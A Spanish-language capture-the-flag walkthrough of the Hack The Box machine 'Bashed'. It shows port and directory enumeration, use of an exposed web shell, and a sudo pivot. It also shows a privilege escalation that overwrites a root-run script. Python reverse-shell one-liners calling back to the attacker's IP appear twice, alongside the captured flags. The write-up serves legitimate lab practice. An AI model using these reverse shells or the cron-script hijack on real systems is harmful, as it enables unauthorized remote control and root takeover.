[HTB] Bashed

Hoy vamos a hackear la maquina de HTB llamada Bashed.
  • Video
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.68 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:32 CEST Nmap scan report for 10.10.10.68 Host is up (0.032s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds
    Vemos que solo tiene el puerto 80 abierto. Lo investigamos un poco mas.
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.68 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/01 11:33:33 Starting gobuster =============================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /css (Status: 301) /dev (Status: 301) /fonts (Status: 301) /images (Status: 301) /index.html (Status: 200) /js (Status: 301) /php (Status: 301) /server-status (Status: 403) /uploads (Status: 301) =============================================================== 2020/06/01 11:33:50 Finished ===============================================================
  • Low Shell
  • Encontramos el directorio /dev. Si visitamos http://10.10.10.68/dev/phpbash.php podemos ver que se ejecuta una "consola" via web. Ponemos nc a la escucha.
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ...
    Y en la "consola" web ponemos la siguiente linea para obtener una shell.
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec t(("10.10.14.10",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    La tenemos...
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 4 /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/sh")' $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • user.txt
  • $ cd /home $ ls arrexel scriptmanager $ cd arrexel $ ls user.txt $ cat user.txt 2c281f318555dbc1b856957c7147bfc1
    Echamos un vistazo a ver que podemos hacer.
    $ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
    Usamos sudo para obtener los privilegios del usuarios scriptmanager.
    $ sudo -u scriptmanager /bin/bash scriptmanager@bashed:/var/www/html/dev$ id uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
  • Privilege Escalation
  • Vemos que hay una carpeta llamada /scripts, y que ejecuta un script (test.py) con privilegios de root. Vamos a modificarlo para obtener otra reverse shell, esta vez con privilegios de root. Ponemos nc a la escucha...
    sml@Cassandra:~$ nc -nlvp 8888 listening on [any] 8888 ...
    Y vamos a ello :)
    scriptmanager@bashed:/$ cd /scripts scriptmanager@bashed:/scripts$ ls test.py test.txt scriptmanager@bashed:/scripts$ cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close scriptmanager@bashed:/scripts$ cat test.txt testing 123! scriptmanager@bashed:/scripts$ ls -l ls -l total 8 -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 May 9 15:06 test.txt echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec t(("10.10.14.10",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > test.py
    Despues de esperar, la tenemos!
    sml@Cassandra:~$ nc -nlvp 8888 listening on [any] 8888 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 55334 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • # cd /root # ls root.txt # cat root.txt cc4f0afe3a1026d402ba10329674a8e2
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".